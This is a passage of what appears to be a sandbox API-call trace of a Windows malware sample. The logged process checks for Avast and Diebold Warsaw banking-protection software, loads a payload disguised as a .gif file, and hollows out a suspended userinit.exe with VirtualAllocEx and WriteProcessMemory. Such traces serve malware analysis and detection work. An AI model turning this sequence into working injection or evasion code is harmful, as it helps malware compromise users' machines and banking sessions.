[466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0086.534] ResumeThread (hThread=0xe4) returned 0x1
[0086.561] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0086.561] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.561] GlobalUnlock (hMem=0x189000c) returned 0
[0086.561] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0086.561] GlobalUnlock (hMem=0x1890004) returned 0
[0086.568] Sleep (dwMilliseconds=0xe74e)
[0096.829] VirtualFree (lpAddress=0x1854000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0096.829] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0096.830] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0096.830] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0096.830] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0096.830] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0
[0096.830] SetFilePointer (in: hFile=0xf0, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0096.830] SetFilePointer (in: hFile=0xf0, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0096.830] SetFilePointer (in: hFile=0xf0, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0096.830] SetFilePointer (in: hFile=0xf0, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0096.832] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0096.832] ReadFile (in: hFile=0xf0, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0096.839] CloseHandle (hObject=0xf0) returned 1
[0096.839] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.840] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.840] GlobalUnlock (hMem=0x189000c) returned 0
[0096.840] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0096.840] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.841] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.841] GlobalUnlock (hMem=0x189000c) returned 0
[0096.841] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0096.841] GlobalLock (hMem=0x189000c) returned 0x25f110
[0096.842] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0096.842] GlobalUnlock (hMem=0x189000c) returned 0
[0096.842] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0096.843] GlobalLock (hMem=0x189000c) returned 0x265120
[0096.843] GlobalHandle (pMem=0x265120) returned 0x189000c
[0096.843] GlobalUnlock (hMem=0x189000c) returned 0
[0096.843] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0096.843] GlobalLock (hMem=0x189000c) returned 0x265120
[0096.844] GlobalHandle (pMem=0x265120) returned 0x189000c
[0096.844] GlobalUnlock (hMem=0x189000c) returned 0
[0096.844] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0096.845] GlobalLock (hMem=0x189000c) returned 0x26f130
[0096.845] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0096.845] GlobalUnlock (hMem=0x189000c) returned 0
[0096.845] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0096.845] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.846] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.846] GlobalUnlock (hMem=0x189000c) returned 0
[0096.846] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0096.846] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.847] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.847] GlobalUnlock (hMem=0x189000c) returned 0
[0096.847] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0096.847] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.847] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.848] GlobalUnlock (hMem=0x189000c) returned 0
[0096.848] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0096.848] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.848] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.848] GlobalUnlock (hMem=0x189000c) returned 0
[0096.848] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0096.848] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.849] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.849] GlobalUnlock (hMem=0x189000c) returned 0
[0096.849] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0096.849] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.850] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.850] GlobalUnlock (hMem=0x189000c) returned 0
[0096.850] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0096.850] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.850] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.851] GlobalUnlock (hMem=0x189000c) returned 0
[0096.851] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0096.851] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.851] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.851] GlobalUnlock (hMem=0x189000c) returned 0
[0096.851] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0096.851] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.852] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.852] GlobalUnlock (hMem=0x189000c) returned 0
[0096.852] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0096.852] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.853] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.853] GlobalUnlock (hMem=0x189000c) returned 0
[0096.853] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0096.854] GlobalLock (hMem=0x189000c) returned 0x27b110
[0096.855] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0096.855] GlobalUnlock (hMem=0x189000c) returned 0
[0096.855] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0096.855] GlobalLock (hMem=0x189000c) returned 0x27b110
[0096.856] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0096.856] GlobalUnlock (hMem=0x189000c) returned 0
[0096.856] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0096.858] GlobalLock (hMem=0x189000c) returned 0x29f120
[0096.859] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0096.859] GlobalUnlock (hMem=0x189000c) returned 0
[0096.859] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0096.859] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.859] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.859] GlobalUnlock (hMem=0x189000c) returned 0
[0096.859] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0096.860] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.860] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.860] GlobalUnlock (hMem=0x189000c) returned 0
[0096.860] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0096.860] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.861] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.861] GlobalUnlock (hMem=0x189000c) returned 0
[0096.861] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0096.861] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.862] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.862] GlobalUnlock (hMem=0x189000c) returned 0
[0096.862] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0096.862] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.863] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.863] GlobalUnlock (hMem=0x189000c) returned 0
[0096.863] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0096.863] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.864] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.864] GlobalUnlock (hMem=0x189000c) returned 0
[0096.864] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0096.864] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.864] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.864] GlobalUnlock (hMem=0x189000c) returned 0
[0096.864] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0096.865] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.865] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.865] GlobalUnlock (hMem=0x189000c) returned 0
[0096.865] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0096.865] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.866] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.866] GlobalUnlock (hMem=0x189000c) returned 0
[0096.866] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0096.866] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.867] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.867] GlobalUnlock (hMem=0x189000c) returned 0
[0096.867] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0096.867] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.867] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.867] GlobalUnlock (hMem=0x189000c) returned 0
[0096.867] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0096.867] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.868] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.868] GlobalUnlock (hMem=0x189000c) returned 0
[0096.868] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0096.868] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.869] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.869] GlobalUnlock (hMem=0x189000c) returned 0
[0096.869] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0096.869] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.932] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.932] GlobalUnlock (hMem=0x189000c) returned 0
[0096.932] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0096.932] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.933] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.933] GlobalUnlock (hMem=0x189000c) returned 0
[0096.933] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0096.933] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.934] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.934] GlobalUnlock (hMem=0x189000c) returned 0
[0096.934] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0096.934] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.934] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.934] GlobalUnlock (hMem=0x189000c) returned 0
[0096.934] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0096.934] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.935] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.935] GlobalUnlock (hMem=0x189000c) returned 0
[0096.935] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0096.935] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.936] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.936] GlobalUnlock (hMem=0x189000c) returned 0
[0096.936] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0096.936] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.937] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.937] GlobalUnlock (hMem=0x189000c) returned 0
[0096.937] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0096.937] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.937] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.937] GlobalUnlock (hMem=0x189000c) returned 0
[0096.937] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0096.937] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.938] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.938] GlobalUnlock (hMem=0x189000c) returned 0
[0096.938] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0096.938] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.939] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.939] GlobalUnlock (hMem=0x189000c) returned 0
[0096.939] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0096.939] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.939] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.940] GlobalUnlock (hMem=0x189000c) returned 0
[0096.940] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0096.940] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.940] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.940] GlobalUnlock (hMem=0x189000c) returned 0
[0096.940] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0096.940] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.941] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.941] GlobalUnlock (hMem=0x189000c) returned 0
[0096.941] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0096.941] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.942] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0096.942] GlobalUnlock (hMem=0x189000c) returned 0
[0096.942] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0096.942] GlobalLock (hMem=0x189000c) returned 0x25b100
[0096.943] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0xec, hThread=0xf0, dwProcessId=0xf7c, dwThreadId=0xf80)) returned 1
[0096.951] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0096.952] GetThreadContext (in: hThread=0xf0, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0xe72be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0xefb90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0096.958] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x7ffd8008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0096.958] VirtualAllocEx (hProcess=0xec, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0096.959] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1910000
[0096.959] VirtualAlloc (lpAddress=0x1910000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1910000
[0096.966] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x400000, lpBuffer=0x1910004*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1910004*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
